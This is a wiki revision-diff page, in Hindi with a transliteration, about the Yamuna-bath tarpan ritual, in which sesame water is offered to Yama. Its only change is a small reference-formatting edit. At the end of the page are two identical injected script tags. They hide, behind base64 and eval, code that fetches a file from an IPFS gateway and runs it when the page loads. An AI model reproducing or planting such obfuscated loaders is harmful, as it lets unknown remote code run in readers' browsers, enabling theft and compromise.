Difference between revisions of "यमुनास्नान तर्पण"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
m (Text replace - ")</ref" to "</ref")
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*यमुनास्नान तर्पण में [[यमुना नदी|यमुना]] के जल में खड़े होकर विभिन्न नामों से [[यमराज|यम]] का [[तिल]] युक्त [[जल]] की तीन [[अंजली|अंजलियों]] से तर्पण किया जाता है। <ref>गदाधरपद्धति (कालसार, 601)</ref>
+
*यमुनास्नान तर्पण में [[यमुना नदी|यमुना]] के जल में खड़े होकर विभिन्न नामों से [[यमराज|यम]] का [[तिल]] युक्त [[जल]] की तीन [[अंजली|अंजलियों]] से तर्पण किया जाता है। <ref>गदाधरपद्धति (कालसार, 601</ref>
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==

Latest revision as of 12:58, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yamunasnan tarpan mean yamuna ke jal mean kh de hokar vibhinn namoan se yam ka til yukt jal ki tin aanjaliyoan se tarpan kiya jata hai. [1]

tika tippani aur sandarbh

  1. gadadharapaddhati (kalasar, 601

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>